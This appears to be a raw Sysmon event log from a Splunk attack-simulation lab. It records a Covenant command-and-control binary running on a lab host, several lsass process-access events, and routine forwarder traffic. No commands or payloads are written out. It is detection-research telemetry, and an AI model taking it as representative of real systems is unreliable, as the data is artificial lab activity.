534500x8000000000000000150117Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.569{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exe 354300x8000000000000000104653Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:36.244{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55396-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local389ldap 354300x8000000000000000104652Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:36.243{54715871-FD28-60C9-2600-00000000CF01}2840C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55396-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local389ldap 23542300x8000000000000000104651Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:38.548{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FB64FD47856947D6546811006D19521,SHA256=998B32FB05A187EE253F23DAA012B8C09D01837B1F1274DC6895E74CF0D1530A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150254Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:38.970{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9184E0C33AB1A0F05EB43FA39897726,SHA256=25AAC18A4ABBD62445B4BDC1FDFF9711CBCB641A5FB8C0A188A2BC2DC12BE290,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150253Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:38.571{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7F2BE373B6997E2256F2F19D51D9ECC,SHA256=05CA1F1D69686813B3B7343EA56074B315752F57BD327AFD2D8CDB21F2EB9F97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104654Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:39.911{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDE8E97C80F458C7F4CBD1B99777A613,SHA256=15D6A2927831D74980EACF03A399D0366A124ED2D8F0C68670E896D6B18344D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150255Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:39.985{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=558DFA00EF0BFB5C0D840DDCF85173B9,SHA256=802A3946148C05ED7FFF1C97B397C1ABC751367996D0B465CA72C4CCEFABC2EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150258Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:40.806{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150257Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:40.806{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150256Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:40.806{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104656Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:41.273{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6008F3048DBBAEFA442B46E388BE3F9F,SHA256=775F66C896B306B7DEBAB8E30C541CA0BC5AA4EA513B933244E863D2E62FB20F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104655Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:38.870{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55397-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150260Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:41.203{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=237127ED419776315F6EDCD58C6D3553,SHA256=F10EB5D069BD2323B9123C9BE8C629CDBAFD69E6A54D31004E066D7123B00F75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150259Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:41.006{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C8C0910D0A4F1E93BAB21BCAF7D7FBE,SHA256=C80D1B4813080EB54F6F597241C65E7367087B22FDD130DD3675E85B2F81C325,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104657Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:42.641{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FF03BB451C0F069390AB12CD685FA54,SHA256=43CBFDC457C2AF182C60A704514985F4CD87099474211D6C0E75A7B9A87F0150,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150262Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:39.974{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58372-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150261Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:42.021{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83C901E733CE6B1BA508284CD159D1A4,SHA256=380F495F9B30737056E66C924972DF2B7AF42A93F4A05761EF67E6A14174506F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104685Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15C0-60CA-5008-00000000CF01}5216C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104684Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15C0-60CA-5008-00000000CF01}5216C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104683Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104682Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104681Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104680Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104679Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104678Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104677Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104676Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15BF-60CA-4F08-00000000CF01}1228C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104675Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104674Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104673Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104672Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104671Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104670Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104669Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104668Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104667Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104666Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 